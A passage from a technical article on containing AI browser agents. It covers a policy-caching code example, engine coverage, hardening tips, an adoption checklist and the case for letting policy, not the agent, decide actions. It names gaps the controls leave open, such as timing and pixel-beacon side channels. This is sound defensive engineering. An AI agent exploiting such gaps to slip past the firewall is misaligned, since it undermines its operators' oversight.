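function createDecisionCache(decide, { maxEntries = 500 } = {}) {
  const entries = new Map();
  const keyOf = (input, policyVersion) =>
    JSON.stringify([policyVersion, input.cmd, input.origin, input.agent.task, input.agent.user]);
  return {
    decide(input, policyVersion, { cacheable = false } = {}) {
      // Argument-dependent decisions must always be evaluated fresh.
      if (!cacheable) return decide(input);
      const key = keyOf(input, policyVersion);
      if (entries.has(key)) return entries.get(key);
      const decision = decide(input);
      if (entries.size >= maxEntries) {
        entries.delete(entries.keys().next().value); // evict the oldest entry
      }
      entries.set(key, decision);
      return decision;
    },
    clear: () => entries.clear(),
  };
}

// Usage: count how often the underlying policy is actually evaluated.
let evaluations = 0;
const cache = createDecisionCache((input) => {
  evaluations += 1;
  return { allow: input.cmd === 'Page.enable' };
});
const baseInput = { cmd: 'Page.enable', origin: 'https://docs.example.com', agent: { task: 'author-doc', user: 'alice@corp' } };

cache.decide(baseInput, 'v1', { cacheable: true });
cache.decide(baseInput, 'v1', { cacheable: true });   // served from cache
cache.decide(baseInput, 'v2', { cacheable: true });   // new policy version: re-evaluated
cache.decide({ ...baseInput, cmd: 'Runtime.evaluate' }, 'v2'); // not cacheable
console.log(evaluations);
```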
Multi-Browser Reality
- Chromium: Full CDP + MV3 coverage. Primary target for capability firewall.
- Firefox: Remote Debug Protocol differs; fewer hooks. Use Playwright’s routing + WebExtensions where possible.
- WebKit/Safari: Limited debugging protocol access and extension APIs. Consider running agents in a managed Chromium container for sensitive tasks even if end users browse elsewhere.
The principle holds: interpose on capabilities available in each engine; where the platform lacks hooks, constrain the agent’s runtime with out‑of‑process proxies (e.g., headless Chrome behind a gateway) rather than running inside the user’s uncontrolled browser.
Limitations and Hardening Tips
- DOM write detection is best‑effort if you allow direct content script interactions. Prefer gating via CDP and disable direct content script writes when feasible.
- Some APIs (e.g., File System Access) are JS‑level; enforce via CDP runtime checks that parse the expression or by running the agent with a restricted JS shim.
- MV3 replaces blocking webRequest with DNR for most extensions; design with DNR’s constraints in mind (declarative rules, rule‑count limits, no arbitrary per‑request code).
- Watch for side channels: timing, pixel beacons in iframes, history leaks. DNR + CSP can mitigate, but not eliminate, all covert channels.
- Supply chain: Ensure the agent and extension code are signed, pinned, and integrity‑verified (SRI for injected assets, extension signing checks).
Adoption Checklist
- Create a CDP capability proxy and ensure agents cannot obtain raw CDP handles.
- Define a policy model and author initial Rego with deny‑by‑default.
- Compile to Wasm and embed OPA in the proxy.
- Enable Fetch interception and gate network egress; add DNR default‑deny with allowlist.
- Implement Isolated World content scripts for the agent runtime; inject strict CSP/Trusted Types where possible.
- Gate permissions and storage operations; preconfigure per origin/task.
- Add structured audit logs and OpenTelemetry tracing; build dashboards for deny/allow rates and hotspots.
- Write OPA unit tests and set up CI to block regressions; version policies and release them via artifact registry.
- Run a canary group of agents under the firewall; tune policies based on real‑world denials.
- Expand coverage to destructive actions and approval workflows.
Closing Thoughts
Agentic browsing requires agentic security. If you permit an AI to operate a browser on your behalf, you must assume it will encounter adversarial inputs and occasionally make bad decisions. The only sustainable mitigation is to separate intent from capability: let the agent propose actions, but let policy adjudicate and enforce.
An OPA/Rego‑backed capability firewall—interposing at CDP, hardened by MV3 declarativeNetRequest, isolated worlds, and CSP—gives you the levers to reduce risk without strangling usefulness. It also gives you the operational advantages of policy‑as‑code: tests, reviews, versioning, and rollbacks.
Build it once, make it fast, and wire every agent through it. Then you can sleep at night knowing your AI browser assistants operate inside a box you control, not one that controls you.
References and Further Reading
- Chrome DevTools Protocol: https://chromedevtools.github.io/devtools-protocol/
- Open Policy Agent: https://www.openpolicyagent.org/
- Rego Policy Language: https://www.openpolicyagent.org/docs/latest/policy-language/
- OPA Wasm: https://www.openpolicyagent.org/docs/latest/wasm/
- Chrome Extensions MV3: https://developer.chrome.com/docs/extensions/mv3/
- declarativeNetRequest: https://developer.chrome.com/docs/extensions/reference/declarativeNetRequest/
- Isolated Worlds: https://developer.chrome.com/docs/extensions/mv3/content_scripts/#isolated_world
- Content Security Policy: https://developer.mozilla.org/docs/Web/HTTP/CSP
- Trusted Types: https://developer.mozilla.org/docs/Web/API/Trusted_Types_API
- chromedp (Go): https://github.com/chromedp/chromedp
- Puppeteer: https://pptr.dev/
- Playwright: https://playwright.dev/